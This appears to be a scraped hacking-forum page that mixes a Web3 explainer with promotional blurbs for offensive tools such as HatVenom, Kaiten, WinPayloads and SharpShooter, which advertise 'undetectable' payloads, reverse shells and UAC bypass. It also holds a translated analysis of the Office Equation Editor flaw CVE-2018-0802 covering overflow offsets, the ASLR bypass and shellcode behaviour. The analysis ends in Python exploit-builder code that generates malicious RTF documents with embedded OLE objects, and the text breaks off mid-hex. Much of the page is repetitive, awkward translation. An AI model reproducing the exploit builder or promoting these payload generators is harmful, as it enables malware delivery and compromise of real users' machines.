Search the Community

[Hidden Content]

Web3 is a new generation of the Internet, which is used by, for example, cryptocurrency users. However, most Internet users are unaware that the web revolution is already underway, just as the transition from Web 1.0 to Web 2.0 was hardly noticeable. As William Gibson, the father of cyberpunk, said, the future is now, just unevenly distributed. Web 3.0 - what is it? Web 3 is, very broadly speaking, a decentralized Internet based on blockchain technology. In practice, it means, for example, transactions and financial services made online without intermediaries. It's not everything. The next generation of networks is to use machine learning and artificial intelligence (AI) in unprecedented ways to create online services. As a result, applications and websites will be created that are ideally suited to the needs of the user. How does Web 3.0 work? Web3 works in a decentralized way. What does it mean? A decentralized network uses a P2P (peer-to-peer) infrastructure, i.e. a network of related devices without a single dominant node. This solution is to guarantee the lack of control, greater transparency and security of user data. Blockchains play a key role in Web3. These are distributed databases that record changes in the system. They are the basis for creating more and more applications and cryptocurrency trading. Another branch of Web3 is personalized information and services provided to users. This is due to the increasingly advanced machine learning and AI techniques as well as the developed semantic network, which guarantees very precise search results. History of the web - from Web 1 to Web 3.0 How did the network evolve and what were its next generations? How is Web 3.0 different from Web 2.0? Web 1.0 This is the first version of the World Wide Web (the term was proposed in 1989 by the British scientist Tim Berners-Lee). It lasted until around 2005. Web1 is the time of static HTML pages, decentralized services (e.g. Yahoo) and search engines (Netscape Navigator, Mosaic). The use of Web 1.0 was passive, Internet users could only read and watch content posted on websites. Interaction between users was limited to discussion forums and messengers, which were very primitive compared to Messenger. Web 2.0 Passive content consumption has been replaced by the ability to interact with the pages you visit. Users exchange content and create it themselves. Intermediaries are social media, blogs, network services. A few years ago, Web2 reached its highest level of development. It is a network that we know very well, dominated by digital giants: Google, Facebook, Amazon, Apple. The power of these global corporations has become so great that politicians decided to introduce regulations regarding, among others, collecting and trading user data (solutions proposed, for example, by the European Union). Web 3.0 Web3, in the words of Gavin Wood, is a “decentralized blockchain-based internet ecosystem.” This is an epoch in the history of the World Wide Web that is just beginning. The best-known characteristic element of Web 3.0 is blockchain technology, cryptocurrencies and NFT (non-fungible tokens). The next revolution on the Internet is the answer to the powerful Big-Tech. Thanks to Web 3.0, network users will regain control over their data and will be able to operate on the Internet without intermediaries (eg banks or large Internet services). Interestingly, not everyone is enthusiastic about the concept of Web3. For example, Elon Musk believes that Web 3 is just a marketing slogan.

During bug bounties, penetrations tests, red teams exercises, and other great activities, there is always a room when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find out the answers to the following questions: What are the most popular subdomains? What are the most common words in multilevel subdomains on different levels? What are the most used words in subdomains? [hide][Hidden Content]]

Agartha { LFI | RCE | Auth | SQLi | Http-Js } Agartha is a penetration testing tool that creates dynamic payload lists and user access matrix to reveal injection flaws and authentication/authorization issues. There are many different attack payloads that exist, but Agartha creates run-time, systematic, and vendor-neutral payloads with many different possibilities and bypassing methods. It also draws attention to user session and URL relationships, which makes it easy to find user access violations. And additionally, it converts Http requests to JavaScript to help dig up XSS issues. In summary: Payload Generator: It creates payloads/wordlists for different attacks. Directory Traversal/Local File Inclusion: It creates file dictionary lists with various encoding and escaping characters. Remote Code Execution: It creates command dictionary lists for both Unix and Windows environments with different combinations. SQL Injection: It creates Batched Queries, Boolean-Based, Union-Based and Time-Based SQLi wordlist for various databases to help find vulnerable spots. Authorization Matrix: It creates an access role matrix based on user sessions and URL lists to determine authorization/authentication-related access violation issues. And Http Request to JavaScript Converter: It converts Http requests to JavaScript code to be useful for further XSS exploitation and more. [hide][Hidden Content]]

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Features Support for most common executable formats like elf, macho, pe. Support for most common architectures like x64, x86, aarch64, armle, mipsle, mipsbe. Ability to modify shellcode by changing pre-defined offsets. Basic functions There are all HatVenom basic functions that can be used to generate a payload, covert data, or inject shellcode. ip_bytes(ip) – Converts IP address to bytes allowed by the shellcode. port_bytes(port) – Converts numeric port to bytes allowed by the shellcode. string_bytes(string) – Converts a string to bytes allowed by the shellcode. generate(file_format, arch, shellcode, offsets={}) – Generates payload for specified target and with specified shellcode. generate_to(file_format, arch, shellcode, offsets={}, filename=’a.out’) – Generates payload for specified target and with specified shellcode and saves it to the specified file. [hide][Hidden Content]]

WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognize something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the tradeoff between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called ‘stealthy’, is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests. Most WhatWeb plugins are thorough and recognize a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. ‘<meta name=”generator” content=”WordPress 2.6.5″>’, but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for “/wp-content/” within relative links. Features: Over 1800 plugins Control the trade-off between speed/stealth and reliability Performance Tuning. Control how many websites to scan concurrently. Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL. Proxy support including TOR Custom HTTP headers Basic HTTP authentication Control over webpage redirection IP address ranges Fuzzy matching Result certainty awareness Custom plugins defined on the command line IDN (International Domain Name) support Changelog v.0.5.5 FIXES #358 Fixed escape_for_sql method (@juananpe) NEW PLUGINS Apache Flink (@juananpe) Dell-OpenManage-Switch-Administrator (@themaxdavitt) FLIR AX8 (@urbanadventurer) Huginn (@urbanadventurer) OpenResty (@urbanadventurer) Telerik UI (@definity) Umbraco (@definity / @ChadBrigance VMware Horizon (@themaxdavitt) PLUGIN UPDATES Joomla (@juananpe) phpMyAdmin (@juananpe) Microsoft IIS (@themaxdavitt) [hide][Hidden Content]]

WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognize something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the tradeoff between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called ‘stealthy’, is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests. Most WhatWeb plugins are thorough and recognize a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. ‘<meta name=”generator” content=”WordPress 2.6.5″>’, but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for “/wp-content/” within relative links. Features: Over 1800 plugins Control the trade-off between speed/stealth and reliability Performance Tuning. Control how many websites to scan concurrently. Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL. Proxy support including TOR Custom HTTP headers Basic HTTP authentication Control over webpage redirection IP address ranges Fuzzy matching Result certainty awareness Custom plugins defined on the command line IDN (International Domain Name) support Changelog v.0.5.4 This is a minor release with three new plugins ✨, and one plugin updates 🔨. 🔧 FIXES #345 Fixed colour output problem with white text being invisible when users have a white terminal background (@urbanadventurer) #347 Fixed MongoDB compatibility logging issue (@juananpe) NEW PLUGINS BlockScout (@urbanadventurer) ElasticSearch (@urbanadventurer) Grafana (@urbanadventurer) PLUGIN UPDATES Kibana (@urbanadventurer) [hide][Hidden Content]]

WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognize something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the tradeoff between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called ‘stealthy’, is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests. Most WhatWeb plugins are thorough and recognize a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. ‘<meta name=”generator” content=”WordPress 2.6.5″>’, but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for “/wp-content/” within relative links. Features: Over 1800 plugins Control the trade-off between speed/stealth and reliability Performance Tuning. Control how many websites to scan concurrently. Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL. Proxy support including TOR Custom HTTP headers Basic HTTP authentication Control over webpage redirection IP address ranges Fuzzy matching Result certainty awareness Custom plugins defined on the command line IDN (International Domain Name) support Changelog v.0.5.3 This is a minor release with miscellaneous changes ✨, seven new plugins 🚀, and two plugin updates ⚙️. 🔧 MISC #319 MongoDB logging now uses upsert (update by default, insert if new) (@juananpe) #314 Makefile now allows supports the PREFIX environment variable (@bfontaine) NEW PLUGINS Adobe Experience Manager (AEM) (@definity) JFrog Artifactory (@bcoles) Matomo (@urbanadventurer) MobileIron-MDM (@bcoles) Slack-Workspace (@bcoles) Wobserver (@urbanadventurer) Zoom (@bcoles) PLUGIN UPDATES Magento (@huntertl) phpMyAdmin (@juananpe) [hide][Hidden Content]]

WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognize something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the tradeoff between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called ‘stealthy’, is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests. Features: Over 1800 plugins Control the trade-off between speed/stealth and reliability Performance Tuning. Control how many websites to scan concurrently. Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL. Proxy support including TOR Custom HTTP headers Basic HTTP authentication Control over webpage redirection IP address ranges Fuzzy matching Result certainty awareness Custom plugins defined on the command line IDN (International Domain Name) support Changelog v.0.5.2 🔧 This is a minor update with 🐞 bug fixes, and one ✨ new plugin, PHP-Slim. FIXES #299 Fixed warning: URI.escape is obsolete error by using the Using Addressable Gem. Thanks @weidsom (Weidsom Nascimento) #306, #307 Improvements to Makefile. @xambroz #304 Log level for mongodb-logger is set to “FATAL”, unless WhatWeb is run with debug-mode enabled. @helsecert NEW PLUGINS PHP-Slim Marcelo Gimenes (@cgimenes) [HIDE][Hidden Content]]

Kaiten A Undetectable Payload Generation. This tool is for educational purpose only, usage of Kaiten for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Requirements MingW (64 & 32) GCC OSSLSIGNCODE Features Undetectable Payload Generation Stealth FUD Payload Self Signing Certificate Random Junk code Affected Devices and Operating Systems Windows Android (soon) Mac/Linux [HIDE][Hidden Content]]

Burp Extension features When you generate your plugin project, the generator will ask you what features should be included in your plugin. If you are familiarized with burp extension developing, the names of the features will be descritive enough, but, if you are new in burp extensions, here is a short description of what can be done with each feature. Extension Tab GUI Custom tab that will be added to Burp's UI. Normally is used to add some functionality (like logger++ extension) or just for enabling the user to config the extension. Context menu GUI Custom context menu will be added to Burp's UI nearly anywhere, by pressing right click. Burp allows to show context menus in any of this situations: Intruder attack results. Intruder payload positions editor. Request editor. Response editor. Non-editable request viewer. Non-editable response viewer. Proxy history. Scanner results. Search results window. Target site map table. Target site map tree. [HIDE][Hidden Content]]

#1 Email Opt-In & Lead Generation Plugin. Guaranteed Increase in Subscribers & Conversions! Demo: [Hidden Content] [HIDE][Hidden Content]]

WinPayloads - Undetectable Windows Payload Generation Winpaylods is a payload generator tool that uses metasploits meterpreter shellcode, injects the users ip and port into the shellcode and writes a python file that executes the shellcode using ctypes. This is then aes encrypted and compiled to an Windows Executable using pyinstaller. Features: Undetectable Windows Payload Generation Easy to Use Gui Upload Payload to Local WebServer Psexec Payload to Target Machine Automatically Runs Metasploit Listener with Correct Settings after Payload Generated Winpayloads also comes with a few features such as uac bypass and payload persistence. These are powershell files that execute on the system when the meterpreter gets a reverse shell. The uac bypass is written by PowerShellEmpire and uses an exploit to bypass uac on local administrator accounts and creates a reverse meterpreter running as local administrator back to the attackers machine. Winpayloads can also setup a SimpleHTTPServer to put the payload on the network to allow downloading on the target machine and also has a psexec feature that will execute the payload on the target machine if supplied with usernames,domain,passwords or hashes. psexec.py - imacket example –Short video in bad quality– [Hidden Content]

Opencart versions 3.0.3.2 and below insecure OCMod generation pre-authentication remote code execution exploit. View the full article

Opencart versions 2.3.0.2 and below suffer from an insecure OCMod generation remote command execution vulnerability. View the full article

About WhatWeb WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called 'stealthy', is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests. Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. '', but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for "/wp-content/" within relative links. Features Over 1800 plugins Control the trade off between speed/stealth and reliability Performance tuning. Control how many websites to scan concurrently. Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL. Proxy support including TOR Custom HTTP headers Basic HTTP authentication Control over webpage redirection IP address ranges Fuzzy matching Result certainty awareness Custom plugins defined on the command line IDN (International Domain Name) support [HIDE][Hidden Content]]

Introduction Increased use of PowerShell attacks led to the fact that they are much better logged and detected today. Yes, PowerShell is flexible, but we needed urgent alternatives. Everyone started to turn to C# and the .NET utilities to execute code on Windows. That’s how SharpShooter, payload generation framework, came out. SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring. Updated with new features [HIDE][Hidden Content]]

Introduction The Microsoft Security Patch of January 2018 fixes the Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. This vulnerability affects almost all versions of Office that Microsoft currently supports.This is the second outbreak of high-level threats using zero-day loopholes since 360's first global interception of the Office 0day vulnerability (CVE-2017-11826).The 360 core security team has been actively communicating with Microsoft and working together to promote the repair of the 0day loophole so that the vulnerability can be properly resolved before disclosure of vulnerability information.The technical principle of the vulnerability is similar to the 17-year-old "Dream Formula" loophole (CVE-2017-11882). It is a re-initiated attack by the hacker using the EQNEDT32.EXE embedded in the office's embedded equation editor. We call it "Nightmare". Formula II (CVE-2018-0802). Attack process analysis We captured several in-field attacks of "Dream Formula II". The on-the-spot samples were embedded with two formulae objects using Nday and 0day loopholes. At the same time, Nday loopholes can attack unpatched systems, and 0day loopholes attack all patches. The system bypasses the ASLR (Address Randomization) security measures of the CVE-2017-11882 patch, and the attack will eventually implant a malicious remote control program on the user's computer. Figure: "Dream Formula II" in the wild sample attack process Vulnerability analysis "Dream Formula II" is a patch bypass vulnerability of CVE-2017-11882. The type is stack overflow. The root cause is Microsoft's stack overflow in the "Dream Formula Generation" patch that does not fix the copy of the font FaceName.This vulnerability will only cause a crash on an unpatched version, but it can be perfectly utilized on a patched version.Below we analyze the CVE-2018-0802 vulnerability by poc samples. Static analysis As with CVE-2017-11882, the trigger data for this vulnerability is within the "Equation Native" stream of the extracted OLE object.The red coiled portion in Figure 1 is core data with a total of 0x99 = 153 bytes.0×08 represents the font tag, followed by 00 01 respectively represents the typeface and style of the font, and the area from 33 to 25 00 is the name of the Font, which is the data copied when the stack overflows.This part of the data contains shellcode, bypass ASLR tricks, process command lines, and related data for padding. We will analyze them later. figure 1 Equation Native data structure According to information published online, the entire "EquationNative" data structure is: MTEFData = MTEF header + MTEF Byte Stream. The structure of QNOLEFILEHDR is shown in Figure 2: figure 2 The structure of the MTEF header is shown in Table 1. Regarding this structure, there are differences between the actual data and the format specifications that we observed. The following table shows the actual observations: Offset Instructions value 0 MTEF version number 0×03 1 The data generation platform 0x00 is generated on Macintosh platform, 0x01 is generated on Windows platform 2 Generated product of this data 0×00 is generated by MathType, 0×01 is generated by Equation Editor 3 Product major version number 0×03 4 Product minor version number 0x0A Table 1 In the attack sample, the MTEF ByteStream structure is shown in Table 2: Initial SIZE record FONT records FONT content Remaining data Table 2 The FONT record and FONT content structure are shown in Table 3: member Instructions Note Tag 0×08 1 byte Tface Typeface number 1 byte Style Font style 1 byte Name Font name NULL-terminated ASCII string table 3 Patch bypass analysis CVE-2018-0802 vulnerability trigger point is located in sub_21E39 (module address is set to 0 in the IDA), as shown in Figure 3, it can be seen that the function of the function is to initialize a LOGFONT structure according to the font data in the formula : image 3 Let's take a look at Microsoft's description of the LOGFONT structure (Figure 4).You can see that the last member of this structure is lfFaceName, Figure 4: LOGFONT Structure Let's take another look at Microsoft's description of the lfFaceName member (Figure 5).You can see that lfFaceName represents the typeface name of the font. On the version being analyzed, it is a null-terminated char string with a maximum length of 32, which contains the terminator NULL. Figure 5 The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName, and the source data for the copy is the user-supplied font name, and the destination address is a LOGFONT structure body address passed in from the parent function.We look back to the parent function of sub_21E39 (Figure 6), you can see this address is located on the stack opened by the parent function, is a local variable of the parent function.The attacker constructs malicious data, overwrites the last two bytes of the return address of the parent function (sub_21774), and then directs the control flow to the shellcode on the stack. Figure 6 During the analysis, we found a place of suspected recursion. Figure 7 shows the disassembly code of sub_21774. We can see that sub_21774 first calls the vulnerability function sub_21E39 to initialize a LOGFONT structure, and then calls the relevant API to pass in the structure. The system gets a font name saved to Name.Then, it compares the obtained Name with the user-supplied lpLogFont. If it is inconsistent (and the sub_115A7 function needs to return False), it will continue to call or not call itself according to the condition specified by a3, while a3 is the third of sub_21E39 function. Parameters. Figure 7 Let's take a look at the third parameters of the parameters, otherwise there may be multiple recursive, can not effectively use this overflow.According to the previous CVE-2017-11882 debugging results (Figure 8), we can see that when parsing the user-supplied font data, the function calling sub_21774 is sub_214C6.Let's look back at sub_214C6 (Figure 9). Sub_214C6 calls sub_21774 to pass a value of 1 to the third parameter, so if(a3) in Figure 7 is true.Let's look at Figure 7, when sub_21774 recursively calls itself, the value passed to the 3rd parameter is 0, which means that sub_21774 will not call itself again, and the recursion level will only have 1 level.Analyzed here, recursive doubts have been solved. Figure 8: CVE-2017-11882 Triggered Execution Flow Figure 9 One problem that has been analyzed here is that if _strcmpi(lpLogfont, &Name) is not true (if the font data is forged by the user, it certainly does not hold here), sub_115A7 will be called, which means that it will go to CVE-2017. -11882 overflow point.In the version without the November patch, if you want to successfully use CVE-2017-11882, CVE-2018-0802 points will not overflow because the former needs to have a much smaller overflow size than the latter, and the copy last has a NULL truncation (we know that the controllable eip that overflows to CVE-2017-11882 requires only 0x2C bytes, and through the analysis below (Figure 11) we can see that the controllable eip overflowing to CVE-2018-0802 requires 0x 94 bytes).On the other hand, if you want to trigger CVE-2018-0802 on a version that does not have an November patch, CVE-2017-11882 will be triggered first.In short, CVE-2018-0802 is not available on the pre-11 patch. However, as can be seen from Figure 10, in the November patch, before the copy of CVE-2017-11882 overflow point, Microsoft performed a length limit of 0x20 on the copy length, and after the copy was completed, it was manually copied at the end of the copy. A NULL was added to invalidate CVE-2017-11882.This directly leads to CVE-2018-0802 being unusable before patching!Now, as long as sub_115A7 returns False, the exploit can be perfectly exploited, and actual debugging finds that sub_115A7 returns False. Figure 10 Dynamic Analysis Spillover data copy With the above analysis, dynamic analysis becomes very simple.Since this overflow point will copy the data, let's monitor the source string and the corresponding stack traceback for each copy. We first enter the OLE data-related Load function (sub_6881), and then break the point before copying the data and proceed. Output, the result is shown in the code: It can be seen from the log that there are two copies, and we can know from the stack trace back that these two copies are the two calls to sub_21174 in the static analysis.The first time is the sub_214c6 call to sub_21174, and the second is the sub_21174 call to itself.It can be seen that the stack overflow obviously occurs on the first copy.Here to mention a little bit, cb ce cc e5 stands for Songs. Let us calculate in detail how much length we need to overflow to control the return address of the parent function (sub_21174). (The conclusion of this question has been mentioned in the “Patch bypass analysis” section). From Figure 11 we can see from lfFaceName(-0× 90) Overflow to ret_addr (+0x4), a total of 0x94 bytes are required. Exceeding the 0x94 portion of the byte will cover the return address one by one from the low address. Figure 11 We look at the data in the POC. As shown in Figure 12, the blue part is the first 0x94 bytes of the overflow, the 2500 is the last two bytes of the overflow, and 00 is the terminator. When the copy encounters 00 Stop.According to the little end address layout, when the poc is running, the EIP will only cover the lower 2 bytes.Why did you do this?The answer is to bypass ASLR. Figure 12 Bypass ASLR Let's take a look at why two bytes of a district can bypass ASLR. First of all, we must be clear that the patch file is opened ASLR, as shown in Figure 13.As a result, the base address for loading EQNEDT32.EXE is random each time, so the first problem to be considered when overflowing is how to bypass ASLR.(As for DEP, you can see from Figure 14 that DEQ is not enabled in EQNEDT32.EXE in the patch file, so it is not necessary to consider DEP under normal circumstances) Unfortunately, attackers clearly understand the Windows system mechanisms and defenses.Because on the Windows platform, the ASLR of a 32-bit process only randomizes the upper 2 bytes of the address each time, while the lower 2 bytes remain unchanged.If a ret instruction can be found in the same low 0xFFFF space of the covered address, and the address is 0xABCD00XY (where ABCD and XY are 6 arbitrary hexadecimal numbers, the second to last byte in the address Must be 0x00, because after the copy needs to be accurately truncated, you can directly use this ret to jump to the stack.Since there is no need to bypass DEP, shellcode can be executed directly on the stack. Figure 13: ASLR Status of EQNEDT32.EXE is Enabled and DEP is Non-Permanent DEP Figure 14: DEP Status of EQNEDT32.EXE is Disabled More unfortunately, within the EQNEDT32.EXE module, Microsoft really gave and gave only one such address (Figure 15). There are only one address that satisfies the condition, namely, 20025, two bytes that are covered in the eip. 25 00 is unique, there is no second ret that satisfies the condition. Figure 15 Let's consider what the original return address of sub_21174 is.Of course, sub_214C6 calls the address of the next instruction of sub_21174. It can be seen from Fig. 16 that the offset of this address is 214E2. According to the overlay of Fig. 12, the offset after the overlay becomes 20025, which consists of the above analysis and Fig. 17 As you can see, this address is a ret instruction.This instruction will pop up sub_214C6 to the first parameter of sub_21174 and switch the control flow to this value to execute.To make matters worse, this first parameter happens to be lpLogFont, which is the FontName provided by the user.So after ret is executed, the control flow will be transferred to the stack and it will just start executing the first byte of the user-supplied FontName. Figure 16 Figure 17 Sample A Shellcode Analysis In poc for sample A transformation, control flow hijacking and execution of the shellcode section are shown in Figure 18: Figure 18: Due to the existence of recursion, we need to return twice from the sub_21774 function, which explains the first two rets Immediately after the jmpeax instruction, WinExec is called, and the command line parameter happens to be calc.exe, as shown in Figure 19: Figure 19 Sample B Shellcode Analysis Sample B bypasses ASLR in the same way as Sample A, but the shellcode portion is not the same as Sample A.Sample B's shellcode finds the kernel32.dll export table (Figures 20 and 21) through the PEB, and then searches through the export table for a hash of the desired function through a specific hash algorithm (Figure 21). The hash value is given in shellcode.The shellcode then saves the searched function address to where the hash value was previously stored (Figure 22). Figure 20: Hash value and copy path name given in sample B's shellcode Figure 21: Finding the required function in the export table of kernel32.dll with the hash value Figure 22: Comparison of data on the stack before and after finding the function address After successfully finding the function and saving the address on the stack, first call the ExpandEnvironmentStringsA function to expand the short path (the short path is saved in the shellcode), and then call CopyFileA to copy the payload to the word plugin directory so that the payload will follow the word next time. Start automatically loaded into memory.Finally call ExitProcess to exit the Equation Editor process (Figure 23).The entire process does not affect the normal opening of the document. Figure 23: Expand the short path, copy the file, and exit the process to sum up The 0day vulnerabilities used by "CVE-2018-0802" are called CVE-2017-11882's twin vulnerabilities. One vulnerability in the attack sample is for unpatched systems, and the other is for vulnerabilities. The system uses two OLEs to attack at the same time. The hackers' well-constructed attacks are perfectly compatible with the different circumstances of the system vulnerability patch environment.The use of this loophole and the Bypass ASLR approach have a certain degree of coincidence, if there is no ret instruction in the EQNEDT32.EXE module can be used to bypass the ASLR, if lpLogFont is not the first parameter of sub_21774, if CVE - 2017-11882 patch repair method forced DEP protection, "Dream Formula II" will not have the opportunity. The latest 360 security products have been able to detect and prevent this zero-day vulnerability, and we recommend that users update the Microsoft Security Patch for January 2018. reference [Hidden Content] Code .py import argparse import os import struct class Package(object): """ Packager spec based on: [Hidden Content] Dropping method by Haifei Li: [Hidden Content] Found being used itw by @MalwareParty: [Hidden Content] """ def __init__(self, filename): self.filename = os.path.basename(filename) self.fakepath = 'C:\\fakepath\\{}'.format(self.filename) self.orgpath = self.fakepath self.datapath = self.fakepath with open(filename,'rb') as f: self.data = f.read() self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata " self.OBJ_TAIL = r"0105000000000000}}" def get_object_header(self): OLEVersion = '01050000' FormatID = '02000000' ClassName = 'Package' szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex') szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex') return ''.join([ OLEVersion, FormatID, szClassName, ClassName.encode('hex') + '00', '00000000', '00000000', szPackageData, ]) def get_package_data(self): StreamHeader = '0200' Label = self.filename.encode('hex') + '00' OrgPath = self.orgpath.encode('hex') + '00' UType = '00000300' DataPath = self.datapath.encode('hex') + '00' DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex') DataLen = struct.pack("<I", len(self.data)).encode('hex') Data = self.data.encode('hex') OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex') OrgPathW = self.datapath.encode('utf-16le').encode('hex') LabelLen = struct.pack("<I", len(self.filename)).encode('hex') LabelW = self.filename.encode('utf-16le').encode('hex') DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex') DefPathW = self.orgpath.encode('utf-16le').encode('hex') return ''.join([ StreamHeader, Label, OrgPath, UType, DataPathLen, DataPath, DataLen, Data, OrgPathWLen, OrgPathW, LabelLen, LabelW, DefPathWLen, DefPathW, ]) def build_package(self): return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} {\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9""" RTF_TRAILER = R"""\par} """ OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """ OBJECT_TRAILER = R""" }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300 00000000 }}} """ OBJDATA_TEMPLATE_0802 = R""" 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1 B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001 0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 